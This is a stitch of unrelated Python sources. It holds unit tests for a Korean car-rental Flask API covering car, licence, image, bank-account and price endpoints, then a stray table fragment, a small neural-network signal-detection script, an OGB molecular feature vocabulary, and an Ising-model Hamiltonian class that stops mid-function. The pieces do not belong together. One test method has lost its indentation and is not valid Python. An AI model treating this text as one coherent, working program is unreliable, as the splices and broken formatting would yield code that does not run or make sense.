# self.check_mongoData('brandName','api/getCarClass','현대')
#
# self.check_mongoData('className','api/getCarModel','K9')
# self.check_mongoData('className','api/getCarModel','쏘울')
    def test_carWith_coordinate(self):
        # Basic info POSTed with explicit coordinates must store the car
        # with exactly those lng/lat values.
        # NOTE(review): verify_code gets '123445' while the session holds
        # '12345' -- looks like a deliberate mismatch for this flow; confirm.
        with self.client.session_transaction() as session:
            rv1= self.register_user()
            session['email'] = 'todhm@nate.com'
            session['verification_code'] = '12345'
            rv2 = self.verify_code(code = '123445')
            carWithCoord = self.return_car_with_coord()
            rv = self.client.post(
                '/api/add_basic_info',
                data=json.dumps(carWithCoord),
                content_type='application/json',
                follow_redirects=True
            )
            data = json.loads(rv.get_data().decode('utf-8'))
            user_id = self.userdao.get_user_id(session['email'])
            car = self.cardao.get_car_obj(user_id)
            self.verify_car_basic(car,carWithCoord)
            self.assertAlmostEqual(float(car.lng),carWithCoord['address']['pointX'])
            self.assertAlmostEqual(float(car.lat),carWithCoord['address']['pointY'])
    def test_update_car(self):
        # POSTing to /api/add_basic_info/<car_id> overwrites the stored
        # basic info for that car.
        with self.client.session_transaction() as session:
            rv1= self.register_user()
            session['email'] = 'todhm@nate.com'
            session['verification_code'] = '12345'
            rv2 = self.verify_code(code = '123445')
            car_without_coord = self.return_car_without_coord()
            rv = self.client.post(
                '/api/add_basic_info',
                data=json.dumps(car_without_coord),
                content_type='application/json',
                follow_redirects=True
            )
            data = json.loads(rv.get_data().decode('utf-8'))
            user_id = self.userdao.get_user_id(session['email'])
            car = self.cardao.get_car_obj(user_id)
            car_id = car.id
            # mutate some fields, then update in place via the car id route
            car_without_coord['brandName'] = "르노삼성"
            car_without_coord['model']="sm5"
            car_without_coord['transmission'] = "manual"
            rv = self.client.post(
                '/api/add_basic_info' + '/'+str(car_id),
                data=json.dumps(car_without_coord),
                content_type='application/json',
                follow_redirects= True
            )
            user_id = self.userdao.get_user_id(session['email'])
            car = self.cardao.get_car_obj(user_id)
            self.verify_car_basic(car,car_without_coord)
    def test_car_without_coordinate(self):
        # Without explicit coordinates the server derives them from the
        # address, so lng/lat must still come back as parseable floats.
        with self.client.session_transaction() as session:
            self.register_user_with_phone()
            car_without_coord = self.return_car_without_coord()
            session['email'] = 'todhm@nate.com'
            rv = self.client.post(
                '/api/add_basic_info',
                data=json.dumps(car_without_coord),
                content_type='application/json',
                follow_redirects=True
            )
            user_id = self.userdao.get_user_id(session['email'])
            car = self.cardao.get_car_obj(user_id)
            self.verify_car_basic(car,car_without_coord)
            self.assertTrue(isinstance(float(car.lng), float))
            self.assertTrue(isinstance(float(car.lat),float))
    def test_proper_address(self):
        # Street-name, lot-number and road style addresses should all resolve.
        self.verify_address('평촌대로40번길 100')
        self.verify_address('신사동 502')
        self.verify_address('제주시 도령로 129')

    def test_proper_region(self):
        # Landmark / institution names should resolve to a region as well.
        self.verify_region('과천도서관')
        self.verify_region('연세대학교')
        self.verify_region('고려대학교')
        self.verify_region('패스트캠퍼스')
    def test_liscence_addwith_correctemail(self):
        # A logged-in session can attach licence data to its own account.
        with self.client.session_transaction() as session:
            self.register_user_with_phone('todhm@naver.com')
            session['email'] = 'todhm@naver.com'
            liscence_data = self.return_full_liscence_info()
            rv = self.client.post(
                '/api/add_liscence_info',
                data=json.dumps(liscence_data),
                content_type='application/json',
                follow_redirects=True
            )
            user = self.userdao.get_user_obj(session['email'])
            self.assertEqual(user.liscence_1 , liscence_data['liscence_1'])

    def test_liscence_with_uncomplete(self):
        # Dropping a required field must not be reported as "success".
        with self.client.session_transaction() as session:
            self.register_user_with_phone('todhm@naver.com')
            session['email'] = 'todhm@naver.com'
            liscence_data = self.return_full_liscence_info()
            liscence_data.pop('liscence_1')
            rv = self.client.post(
                '/api/add_liscence_info',
                data=json.dumps(liscence_data),
                content_type='application/json',
                follow_redirects=True
            )
            self.assertTrue(json.loads(rv.data.decode())['message'] !="success")
    def test_liscence_addwith_withoutsession(self):
        # Licence data posted while logged in as a different user must not
        # land on the first user's account.
        self.register_user_with_phone(email = 'todhm@naver.com')
        self.client.get('/logout')
        self.register_user_with_phone(email = 'gmlaud14@nate.com')
        liscence_data = self.return_full_liscence_info()
        rv = self.client.post(
            '/api/add_liscence_info',
            data=json.dumps(liscence_data),
            content_type='application/json',
            follow_redirects=True
        )
        with self.client.session_transaction() as session:
            user = self.userdao.get_user_obj('todhm@naver.com')
            self.assertTrue(user.liscence_1 != liscence_data['liscence_1'])

    def test_get_liscence(self):
        # Round-trip: stored licence fields come back unchanged from the API.
        self.register_user_with_phone(email = 'todhm@naver.com')
        liscence_data = self.return_full_liscence_info()
        rv = self.client.post(
            '/api/add_liscence_info',
            data=json.dumps(liscence_data),
            content_type='application/json',
            follow_redirects=True
        )
        with self.client.session_transaction() as session:
            rv = self.client.get('/api/get_liscence')
            liscence_json = json.loads(rv.get_data().decode('utf-8'))
            self.assertTrue(liscence_json['liscence_1'] == liscence_data['liscence_1'])
            self.assertTrue(liscence_json['liscence_2'] == liscence_data['liscence_2'])
            self.assertTrue(liscence_json['liscence_3'] == liscence_data['liscence_3'])
            self.assertTrue(liscence_json['liscence_4'] == liscence_data['liscence_4'])
            self.assertTrue(liscence_json['birth'] == liscence_data['birth'])
            self.assertTrue(liscence_json['serialNumber'] == liscence_data['serialNumber'])

    def test_empty_liscence(self):
        # A user with no licence stored gets a payload without licence keys.
        # NOTE(review): asserts on 'liscecne_1' (typo); with .get() this
        # passes vacuously -- probably meant 'liscence_1'; confirm and fix.
        self.register_user_with_phone(email = 'todhm@naver.com',name='강희명')
        with self.client.session_transaction() as session:
            rv = self.client.get('/api/get_liscence')
            liscence_json = json.loads(rv.get_data().decode('utf-8'))
            self.assertTrue(liscence_json.get('liscecne_1')is None)
    def test_caroption_add(self):
        # Posting options for an existing car persists a CarOption row
        # whose fields match every submitted value.
        car = self.return_car_obj()
        data = self.get_caroption_data()
        url = '/api/add_car_option'+ "/" + str(car.id)
        rv2=self.client.post(
            url,
            data=json.dumps(data),
            content_type='application/json',
            follow_redirects=True
        )
        carOption = CarOption.query.filter(CarOption.id==car.id).first()
        self.validate_caroption(data,carOption)

    def test_add_caroption_without_carData(self):
        # Options for a car id that does not exist are rejected with 403.
        self.register_user_with_phone(email = 'todhm@naver.com',name='강희명')
        data = self.get_caroption_data()
        rv2=self.client.post('/api/add_car_option/1',
            data=json.dumps(data),
            content_type='application/json',
            follow_redirects=True)
        self.assertTrue(rv2.status_code==403)

    def test_add_caroption_with_unvalid_carData(self):
        # A payload missing the required 'price' field is rejected with 403.
        car = self.return_car_obj()
        data = self.get_caroption_data()
        data.pop('price')
        url = '/api/add_car_option'+ "/" + str(car.id)
        rv2=self.client.post(
            url,
            data=json.dumps(data),
            content_type='application/json',
            follow_redirects=True
        )
        self.assertEqual(rv2.status_code,403)
    def test_update_caroption(self):
        # Re-posting options for the same car id overwrites the stored row.
        car = self.return_car_obj()
        data = self.get_caroption_data()
        url = '/api/add_car_option'+ "/" + str(car.id)
        rv2=self.client.post(
            url,
            data=json.dumps(data),
            content_type='application/json',
            follow_redirects=True
        )
        data['price'] = 400000
        data['description']='자동차가 업드레이드되서 돈을 조금 더 받아야할것 같습니다. '
        rv3 = self.client.post(
            url,
            data=json.dumps(data),
            content_type='application/json',
            follow_redirects=True
        )
        carOption = CarOption.query.filter(CarOption.id==car.id).first()
        self.validate_caroption(data,carOption)

    def test_get_caroption(self):
        # GET returns exactly the persisted option fields.
        car = self.return_car_obj()
        data = self.get_caroption_data()
        url = '/api/add_car_option'+ "/" + str(car.id)
        rv2=self.client.post(
            url,
            data=json.dumps(data),
            content_type='application/json',
            follow_redirects=True
        )
        url = '/api/get_car_option'+ "/" + str(car.id)
        carOption = CarOption.query.filter(CarOption.id==car.id).first()
        rv3 = self.client.get(
            url,
            content_type='application/json',
            follow_redirects=True
        )
        json_data = json.loads(rv3.get_data().decode('utf-8'))
        self.validate_caroption(json_data,carOption)

    def test_empty_caroption(self):
        # GET for a car with no stored options still returns a JSON object.
        car = self.return_car_obj()
        data = self.get_caroption_data()
        url = '/api/get_car_option'+ "/" + str(car.id)
        carOption = CarOption.query.filter(CarOption.id==car.id).first()
        rv3 = self.client.get(
            url,
            content_type='application/json',
            follow_redirects=True
        )
        json_data = json.loads(rv3.get_data().decode('utf-8'))
        self.assertTrue(isinstance(json_data,dict))
def test_add_proper_image(self):
car = self.return_car_obj()
car_id = str(car.id)
test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
with open(test_image_url, 'r+b') as f:
rv= self.client.post('/api/upload_image/' + car_id, buffered=True,
content_type='multipart/form-data',
data={'image':f})
carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
imgUrl =json.loads(rv.get_data().decode('utf-8'))['imgList']
self.assertTrue(len(imgUrl)==1)
self.assertTrue(carImage.active ==1)
self.assertTrue(carImage.image_index == 0)
with open("."+carImage.imgsrc,"r+b") as f2:
self.assertTrue(f2 is not None )
self.remove_image(carImage.image,car.id)
def test_update_image(self):
    """Upload an image, then replace it via /api/update_image one hour later.

    The replacement must keep exactly one active image at index 0 while
    storing it under a new URL (upload timestamps differ via freeze_time).

    Fix: removed a leftover debug ``print(imgUrl, imgUrl2)`` that polluted
    test output.
    """
    car = self.return_car_obj()
    car_id = str(car.id)
    test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
    with freeze_time(dt.now()) as frozen_datetime:
        # Initial upload.
        with open(test_image_url, 'r+b') as f:
            rv1= self.client.post('/api/upload_image/' + car_id, buffered=True,
                                  content_type='multipart/form-data',
                                  data={'image':f})
        imgUrl =json.loads(rv1.get_data().decode('utf-8'))['imgList']
        carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
        with open("."+carImage.imgsrc,"r+b") as f:
            self.assertTrue(f is not None )
        self.remove_image(carImage.image,car.id)
        # Advance the frozen clock so the replacement gets a new filename.
        frozen_datetime.tick(delta=timedelta(hours=1))
        with open(test_image_url, 'r+b') as f2:
            rv2 = self.client.post('/api/update_image/' + car_id, buffered=True,
                                   content_type='multipart/form-data',
                                   data={'image':f2,'image_index':0})
        imgUrl2 =json.loads(rv2.get_data().decode('utf-8'))['imgList']
        carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
        self.assertTrue(len(imgUrl)==1)
        self.assertTrue(carImage.active ==1)
        self.assertTrue(carImage.image_index == 0)
        # The replacement must live at a different URL than the original.
        self.assertTrue(imgUrl[0]['url'] != imgUrl2[0]['url'])
        with open("."+carImage.imgsrc,"r+b") as f:
            self.assertTrue(f is not None )
        self.remove_image(carImage.image,car.id)
def test_update_image_multiple_times(self):
    # Replace a car's image twice in a row; every replacement must produce a
    # distinct stored URL while keeping a single active image at index 0.
    car = self.return_car_obj()
    car_id = str(car.id)
    test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
    with freeze_time(dt.now()) as frozen_datetime:
        with open(test_image_url, 'r+b') as f:
            rv1= self.client.post('/api/upload_image/' + car_id, buffered=True,
                                  content_type='multipart/form-data',
                                  data={'image':f})
        imgUrl =json.loads(rv1.get_data().decode('utf-8'))['imgList']
        carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
        self.remove_image(carImage.image,car.id)
        # Tick the frozen clock so each upload gets a unique timestamped name.
        frozen_datetime.tick(delta=timedelta(hours=1))
        with open(test_image_url, 'r+b') as f2:
            rv2 = self.client.post('/api/update_image/' + car_id, buffered=True,
                                   content_type='multipart/form-data',
                                   data={'image':f2,'image_index':0})
        imgUrl2 =json.loads(rv2.get_data().decode('utf-8'))['imgList']
        carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
        self.remove_image(carImage.image,car.id)
        frozen_datetime.tick(delta=timedelta(hours=1))
        # NOTE(review): image_index is sent as the string '0' here (int 0
        # above) — presumably exercising server-side form coercion; confirm.
        with open(test_image_url, 'r+b') as f2:
            rv3 = self.client.post('/api/update_image/' + car_id, buffered=True,
                                   content_type='multipart/form-data',
                                   data={'image':f2,'image_index':'0'})
        imgUrl3 =json.loads(rv3.get_data().decode('utf-8'))['imgList']
        carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
        self.remove_image(carImage.image,car.id)
    carImage = CarImage.query.filter(CarImage.car_id==car_id).first()
    self.assertTrue(len(imgUrl)==1)
    self.assertTrue(carImage.active ==1)
    self.assertTrue(carImage.image_index == 0)
    # All three stored URLs must differ pairwise.
    self.assertTrue(imgUrl[0]['url'] != imgUrl2[0]['url'])
    self.assertTrue(imgUrl[0]['url'] != imgUrl3[0]['url'])
    self.assertTrue(imgUrl2[0]['url'] != imgUrl3[0]['url'])
def test_add_multiple_valid_image(self):
    # Upload two different images one second apart; the second response must
    # list both, with image_index values matching their upload order.
    car = self.return_car_obj()
    car_id = str(car.id)
    test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
    test_image_url2 = "."+TEST_UPLOADED_FOLDER + "/background4.jpg"
    with freeze_time(dt.now()) as frozen_datetime:
        with open(test_image_url, 'r+b') as f:
            rv1 =self.client.post('/api/upload_image/' + car_id, buffered=True,
                                  content_type='multipart/form-data',
                                  data={'image':f})
        # Tick so the second upload gets a distinct timestamped filename.
        frozen_datetime.tick(delta=timedelta(seconds=1))
        with open(test_image_url2, 'r+b') as f2:
            rv2 = self.client.post('/api/upload_image/' + car_id, buffered=True,
                                   content_type='multipart/form-data',
                                   data={'image':f2,'image_index':1})
    imgUrl1 =json.loads(rv1.get_data().decode('utf-8'))['imgList']
    imgUrl2 =json.loads(rv2.get_data().decode('utf-8'))['imgList']
    self.assertTrue(len(imgUrl1)==1)
    self.assertTrue(len(imgUrl2)==2)
    for idx,img in enumerate(imgUrl2):
        # Each reported image must exist on disk and carry its list position
        # as image_index; files are deleted afterwards to keep tests hermetic.
        with open( "."+img['url'], 'r+b') as f3:
            self.assertTrue(f3 is not None)
        self.assertTrue(img['image_index'] ==idx)
        os.remove("."+img['url'])
@freeze_time("Jan 14th, 2020", tick=True)
def test_get_car_img(self):
    # Upload two images, then fetch them via /api/get_images and verify the
    # listing is successful, complete, ordered, and points at real files.
    car = self.return_car_obj()
    car_id = str(car.id)
    test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
    with freeze_time(dt.now()) as frozen_datetime:
        with open(test_image_url, 'r+b') as f:
            rv1= self.client.post('/api/upload_image/' + car_id, buffered=True,
                                  content_type='multipart/form-data',
                                  data={'image':f})
        frozen_datetime.tick(delta=timedelta(seconds=1))
        # NOTE(review): this sends 'car_index' where sibling tests send
        # 'image_index' — presumably a typo the server ignores; confirm
        # against the upload_image handler.
        with open(test_image_url, 'r+b') as f2:
            rv2 = self.client.post('/api/upload_image/' + car_id, buffered=True,
                                   content_type='multipart/form-data',
                                   data={'image':f2,'car_index':1})
    img_response = json.loads(self.client.get('/api/get_images/'+car_id).get_data().decode('utf-8'))
    self.assertTrue(img_response['message']=="success")
    self.assertTrue(len(img_response['imgList'])==2)
    for idx,img in enumerate(img_response['imgList']):
        with open("."+img['url'],"r+b") as f3:
            self.assertTrue(img['image_index']==idx)
            self.assertTrue(f3 is not None )
        os.remove("."+img['url'])
def test_remove_img(self):
    """Upload one image, deactivate it via /api/remove_image, and confirm the
    database now holds exactly one inactive CarImage row."""
    car = self.return_car_obj()
    car_id = str(car.id)
    source_path = "." + TEST_UPLOADED_FOLDER + "/background.jpg"
    with open(source_path, 'r+b') as image_fh:
        self.client.post('/api/upload_image/' + car_id, buffered=True,
                         content_type='multipart/form-data',
                         data={'image': image_fh})
    removal_payload = {}
    removal_payload['image_index'] = 0
    remove_rv = self.client.post('/api/remove_image/' + car_id,
                                 data=json.dumps(removal_payload),
                                 content_type='application/json',
                                 follow_redirects=True)
    inactive_rows = CarImage.query.filter(CarImage.car_id == car_id).filter(CarImage.active == False).all()
    self.assertTrue(len(inactive_rows) == 1)
    self.assertTrue(remove_rv.status_code == 200)
    # Remove the files backing the deactivated rows.
    for row in inactive_rows:
        self.remove_image(row.image, car_id)
@freeze_time("Jan 14th, 2020", tick=True)
def test_remove_multiple_img(self):
    # Upload two images, delete their files directly, then deactivate both
    # via /api/remove_image; both DB rows must end up inactive.
    car = self.return_car_obj()
    car_id = str(car.id)
    test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
    test_image_url2 = "."+TEST_UPLOADED_FOLDER + "/background4.jpg"
    with freeze_time(dt.now()) as frozen_datetime:
        with open(test_image_url, 'r+b') as f:
            rv1= self.client.post('/api/upload_image/' + car_id, buffered=True,
                                  content_type='multipart/form-data',
                                  data={'image':f})
        frozen_datetime.tick(delta=timedelta(hours=1))
        with open(test_image_url2, 'r+b') as f2:
            rv2 = self.client.post('/api/upload_image/' + car_id, buffered=True,
                                   content_type='multipart/form-data',
                                   data={'image':f2})
    imgUrl =json.loads(rv2.get_data().decode('utf-8'))['imgList']
    removeUrl={}
    removeUrl['image_index'] = 0
    # Delete the uploaded files up-front; removal below is DB-side only.
    for img in imgUrl:
        os.remove("."+img['url'])
    with freeze_time(dt.now()) as frozen_datetime:
        rv = self.client.post('/api/remove_image/' + car_id,
                              data=json.dumps(removeUrl),
                              content_type='application/json',
                              follow_redirects= True
                              )
        removeUrl['image_index'] = 1
        frozen_datetime.tick(delta=timedelta(hours=1))
        rv2 = self.client.post('/api/remove_image/' + car_id,
                               data=json.dumps(removeUrl),
                               content_type='application/json',
                               follow_redirects= True
                               )
    carImage = CarImage.query.filter(CarImage.car_id==car_id).filter(CarImage.active==False).all()
    self.assertTrue(len(carImage)==2)
    self.assertTrue(rv.status_code==200)
    self.assertTrue(rv2.status_code==200)
@freeze_time("Jan 14th, 2020", tick=True)
def test_add_invalid_img(self):
    """Uploading an invalid image file must fail and create no CarImage rows."""
    car = self.return_car_obj()
    car_id = str(car.id)
    bogus_path = "." + TEST_UPLOADED_FOLDER + "/hm.jpg"
    with open(bogus_path, 'r+b') as bogus_fh:
        upload_rv = self.client.post('/api/upload_image/' + car_id, buffered=True,
                                     content_type='multipart/form-data',
                                     data={'image': bogus_fh})
    body = json.loads(upload_rv.data.decode())
    self.assertTrue(body['message'] == "fail")
    rows = CarImage.query.filter(CarImage.car_id == car_id).all()
    self.assertTrue(len(rows) == 0)
def test_get_inactive_car(self):
    """A never-activated car must report active == False from /api/get_images."""
    car = self.return_car_obj()
    car_id = str(car.id)
    response = self.client.get('/api/get_images/' + car_id)
    payload = json.loads(response.data.decode())
    self.assertTrue(payload['active'] == False)
def test_get_active_car(self):
    """After activation, /api/get_images must report active == True."""
    car = self.return_car_obj()
    car_id = str(car.id)
    self.assertTrue(car.active == 0)
    self.client.post('/api/activate_car/' + car_id)
    response = self.client.get('/api/get_images/' + car_id)
    payload = json.loads(response.data.decode())
    self.assertTrue(payload['active'] == True)
def test_car_activate(self):
    """POST /api/activate_car flips Car.active from 0 to 1 and reports success."""
    car = self.return_car_obj()
    car_id = str(car.id)
    self.assertTrue(car.active == 0)
    response = self.client.post('/api/activate_car/' + car_id)
    self.assertTrue("success" in response.get_data().decode('utf-8'))
    refreshed_car = Car.query.filter(Car.id == car_id).first()
    self.assertTrue(response.status_code == 200)
    self.assertTrue(refreshed_car.active == 1)
#한사용자가 여러대의 차량을 등록해놓고 사진을 업데이트 시키면 다른자동차의 사진이 없어지는 문제를 확인하기 위한 테스트. (Regression test: when one user has several cars registered, updating one car's photo must not delete another car's photos.)
def test_update_multiple_images(self):
    # Two cars owned by the same user each get two images; updating an image
    # on the second car must not clobber the first car's image files.
    car = self.return_car_obj()
    car_id = str(car.id)
    test_image_url = "."+TEST_UPLOADED_FOLDER + "/background.jpg"
    test_image_url2 = "."+TEST_UPLOADED_FOLDER + "/background4.jpg"
    with freeze_time(dt.now()) as frozen_datetime:
        with open(test_image_url, 'r+b') as f:
            rv1 =self.client.post('/api/upload_image/' + car_id, buffered=True,
                                  content_type='multipart/form-data',
                                  data={'image':f})
        frozen_datetime.tick(delta=timedelta(hours=1))
        with open(test_image_url2, 'r+b') as f2:
            rv2 = self.client.post('/api/upload_image/' + car_id, buffered=True,
                                   content_type='multipart/form-data',
                                   data={'image':f2,'image_index':1})
    # Second car registered for the same, still-logged-in user.
    car2 = self.return_car_obj(remainUser= True)
    car_2id = str(car2.id)
    with freeze_time(dt.now()) as frozen_datetime:
        with open(test_image_url, 'r+b') as f:
            rv1 =self.client.post('/api/upload_image/' + car_2id, buffered=True,
                                  content_type='multipart/form-data',
                                  data={'image':f})
        frozen_datetime.tick(delta=timedelta(hours=1))
        with open(test_image_url2, 'r+b') as f2:
            rv2 = self.client.post('/api/upload_image/' + car_2id, buffered=True,
                                   content_type='multipart/form-data',
                                   data={'image':f2})
        frozen_datetime.tick(delta=timedelta(hours=1))
        # Update only car2's first image.
        with open(test_image_url2, 'r+b') as f:
            rv2 = self.client.post('/api/update_image/' + car_2id, buffered=True,
                                   content_type='multipart/form-data',
                                   data={'image':f,'image_index':0})
    carImage = CarImage.query.filter(CarImage.car_id==car_id).filter(CarImage.active==True).filter(CarImage.image_index==0).first()
    car2Image = CarImage.query.filter(CarImage.car_id==car_2id).filter(CarImage.active==True).filter(CarImage.image_index==0).first()
    # Both cars' index-0 image files must still exist on disk.
    with open("."+carImage.imgsrc,"r+b") as f:
        self.assertTrue(f is not None )
    with open("."+car2Image.imgsrc,"r+b") as f:
        self.assertTrue(f is not None )
#차량등록시 사용자들이 알맞은 위치에 존재하고 있는지 확인 (Checks that users resume at the correct step of the car-registration flow.)
def test_get_last_status(self):
    """A freshly registered user starts at the first stage of the car-registration flow."""
    self.register_user_with_phone(email='todhm@naver.com')
    response = self.client.get('/api/getLastStatus')
    payload = json.loads(response.data.decode())
    expected_stages = ["자동차 등록", "면허*계좌등록", "세부사항조정", "사진 등록", "최종확인"]
    self.assertEqual(payload['stage_name'], expected_stages)
#은행계좌등록.
def test_bank_account(self):
    """Posting bank details with a malformed account-holder field must be rejected with 400."""
    user = self.register_user_with_phone(email='todhm@naver.com')
    bank_info = self.get_bank_info()
    holder_info = bank_info['account_holder_info']
    account_number = bank_info['account_num']  # read but unused, as in the original flow
    # Corrupt the holder info by dropping its first character.
    bank_info['account_holder_info'] = holder_info[1:]
    response = self.client.post(
        '/api/add_bank_account',
        data=json.dumps(bank_info),
        content_type='application/json'
    )
    result = json.loads(response.data.decode())
    self.assertTrue(result['message'] != "success")
    self.assertEqual(response.status_code, 400)
#은행계좌등록.
def test_get_bank_account(self):
    """A stored bank account is returned intact by /api/get_bank_account."""
    user = self.register_user_with_phone(email='todhm@naver.com')
    bank = self.add_bank(user.id)
    response = self.client.get('/api/get_bank_account')
    payload = json.loads(response.data.decode())
    payload.pop('message')
    self.verify_data(bank, payload)
#가격불러오기.
def test_get_car_price(self):
    """The price endpoint reports the stored base price and zero discounts by default."""
    car = self.activate_car_without_img()
    response = self.client.get("/api/get_car_price/" + car.id)
    payload = json.loads(response.data.decode())
    self.assertTrue(car.caroption.price == payload['ordinaryPrice'])
    self.assertTrue(payload['weeklyDiscount'] == 0)
    self.assertTrue(payload['monthlyDiscount'] == 0)
#가격 및 주별 월별 할인율 추가
def test_add_car_ordinary_price(self):
    """Posting a base price plus weekly/monthly discounts updates the CarOption row."""
    car = self.activate_car_without_img()
    price_info = {
        'ordinaryPrice': 5000,
        'weeklyDiscount': 10,
        'monthlyDiscount': 30,
    }
    response = self.client.post(
        '/api/add_car_ordinary_price/' + car.id,
        data=json.dumps(price_info),
        content_type='application/json'
    )
    payload = json.loads(response.data.decode())
    self.assertTrue(payload['message'] == "success")
    self.assertTrue(price_info['ordinaryPrice'] == car.caroption.price)
    self.assertTrue(price_info['weeklyDiscount'] == car.caroption.weekly_discount)
    self.assertTrue(price_info['monthlyDiscount'] == car.caroption.monthly_discount)
| 29,469 | 9,708 |
# train-net.py
# Use the neural network module to detect simple signals
import numpy as np
import matplotlib.pyplot as plt
import random
from src.net import Net
def main():
    """Detect two superimposed signals in noisy data with the Net module.

    Builds 100 noisy length-10 samples, each the base waveform plus a random
    0/1 mix of two additive patterns, trains a network to recover the two mix
    bits, prints the per-epoch error list, and plots it on a log scale.

    Fixes over the original:
      * py2-only ``print`` statement replaced with the ``print()`` function.
      * local name ``input`` renamed so it no longer shadows the builtin.
    """
    # --- Step 1: make dataset ---
    random.seed()
    # Make 3 inputs - 1 base and 2 added inputs
    sig_len = 10
    y_base = np.array([1, 2, 3, 2, 6, 5, 0, -1, 2, 4])
    y_add1 = np.array([0, 0, 1, 0, -2, 0, 0, 1, 1, 0])
    y_add2 = np.array([1, 0, 0, 1, 2, -1, 0, 0, 0, 0])
    # Set up a bunch of random signals to detect
    y_num = 100
    signal1 = np.array([random.randint(0, 1) for i in range(y_num)])
    signal2 = np.array([random.randint(0, 1) for i in range(y_num)])
    signal = np.array([signal1, signal2])
    # Add up the inputs accordingly
    y_list = np.zeros([y_num, len(y_base)])
    for i in range(y_num):
        y_sum = np.array([y_base[j] + signal1[i]*y_add1[j] + signal2[i]*y_add2[j]
                          for j in range(sig_len)])
        y_list[i] = y_sum
    # Add noise
    noise = np.random.random([y_num, len(y_base)]) / 10
    y_list += noise
    # --- Step 2: train neural network ---
    # Renamed from 'input' to avoid shadowing the builtin.
    inputs = np.array(y_list)
    signal = signal.transpose()
    # Set up min and max for each input.
    # Can give the network a good idea of input ranges or just a rough range:
    # limits = [[-20, 20]] * 10
    limits = [[y_base[i]-2, y_base[i]+2] for i in range(10)]
    # Make network
    net = Net(limits, 2, 2)
    errorList = net.train_many(inputs, signal, 0.1, 100, 0.001, True)
    print("\n".join(map(str, errorList)))
    # --- Step 3: check results ---
    # Plot error vs. training epochs
    plt.semilogy(errorList)
    plt.grid()
    plt.xlabel('Epochs')
    plt.ylabel('SSE')
    plt.show()
# allowable multiple choice node and edge features
# code from https://github.com/snap-stanford/ogb/blob/master/ogb/utils/features.py
# Each list enumerates the vocabulary of one categorical feature; features are
# encoded as indices into these lists, with "misc" as the catch-all bucket for
# values outside the enumerated range.
allowable_features = {
    # --- atom (node) feature vocabularies ---
    "possible_atomic_num_list": list(range(1, 119)) + ["misc"],  # type: ignore
    "possible_chirality_list": [
        "CHI_UNSPECIFIED",
        "CHI_TETRAHEDRAL_CW",
        "CHI_TETRAHEDRAL_CCW",
        "CHI_OTHER",
    ],
    "possible_degree_list": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, "misc"],
    "possible_formal_charge_list": [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, "misc"],
    "possible_numH_list": [0, 1, 2, 3, 4, 5, 6, 7, 8, "misc"],
    "possible_number_radical_e_list": [0, 1, 2, 3, 4, "misc"],
    "possible_hybridization_list": ["SP", "SP2", "SP3", "SP3D", "SP3D2", "misc"],
    "possible_is_aromatic_list": [False, True],
    "possible_is_in_ring_list": [False, True],
    # --- bond (edge) feature vocabularies ---
    "possible_bond_type_list": ["SINGLE", "DOUBLE", "TRIPLE", "AROMATIC", "misc"],
    "possible_bond_stereo_list": [
        "STEREONONE",
        "STEREOZ",
        "STEREOE",
        "STEREOCIS",
        "STEREOTRANS",
        "STEREOANY",
    ],
    "possible_is_conjugated_list": [False, True],
}
def get_atom_feature_dims():
    """Return the vocabulary size of each atom (node) feature, in encoding order."""
    atom_feature_keys = [
        "possible_atomic_num_list",
        "possible_chirality_list",
        "possible_degree_list",
        "possible_formal_charge_list",
        "possible_numH_list",
        "possible_number_radical_e_list",
        "possible_hybridization_list",
        "possible_is_aromatic_list",
        "possible_is_in_ring_list",
    ]
    return [len(allowable_features[key]) for key in atom_feature_keys]
def get_bond_feature_dims():
    """Return the vocabulary size of each bond (edge) feature, in encoding order."""
    bond_feature_keys = [
        "possible_bond_type_list",
        "possible_bond_stereo_list",
        "possible_is_conjugated_list",
    ]
    return [len(allowable_features[key]) for key in bond_feature_keys]
| 2,165 | 794 |
"""coupling Hamiltonian class def"""
from math import exp
import numpy as np
from .spinconfig import SpinConfig
class Hamiltonian():
    """Hamiltonian of a 2-d Ising model with periodic boundary conditions.

    Parameters
    ----------
    J : float, optional
        Nearest-neighbour coupling constant (default -2).
    u : float, optional
        External-field strength (default 1.1).

    Examples
    --------
    >>> ham = Hamiltonian(-2, 1.1)
    >>> ham.J
    -2
    """

    def __init__(self, J=-2, u=1.1):
        self.u = u
        self.J = J

    def energy(self, spinlist):
        """Total energy of one spin configuration.

        Parameters
        ----------
        spinlist : list
            Spins encoded as 1 (up) / 0 (down); neighbours wrap around.

        Returns
        -------
        float
            External-field energy plus nearest-neighbour coupling energy.

        Examples
        --------
        >>> Hamiltonian(-2, 1.1).energy([0, 1, 0, 1, 1])
        -4.9
        """
        self.spinlist = spinlist
        total = 0
        # Field term: each up spin contributes +u, each down spin -u.
        for spin in self.spinlist:
            if spin == 1:
                total += self.u
            elif spin == 0:
                total -= self.u
            else:
                print("Spin input error")
        # Coupling term over wrap-around neighbour pairs:
        # aligned pair -> -J, anti-aligned pair -> +J.
        rotated = self.spinlist[1:]
        rotated.append(self.spinlist[0])
        for left, right in zip(self.spinlist, rotated):
            if left == right:
                total -= self.J
            else:
                total += self.J
        return total

    def average(self, T=1, N=0):
        """Thermodynamic averages over every configuration of an N-site chain.

        Parameters
        ----------
        T : float, optional
            Temperature (default 1).
        N : int, optional
            Number of spin sites (default 0).

        Returns
        -------
        tuple of float
            (average energy, average magnetisation, heat capacity,
            magnetic susceptibility).

        Examples
        --------
        >>> Hamiltonian(-2, 1.1).average(10, 4)
        (-1.894905381126034,
         -0.29386784002835087,
         0.17850826588133842,
         0.26682385808137565)
        """
        config = SpinConfig(N)
        partition = 0
        e_sum = 0
        e2_sum = 0
        m_sum = 0
        m2_sum = 0
        # Boltzmann-weighted sums over all 2**N configurations.
        for index in range(config.iMax):
            spins = config.input_decimal(index)
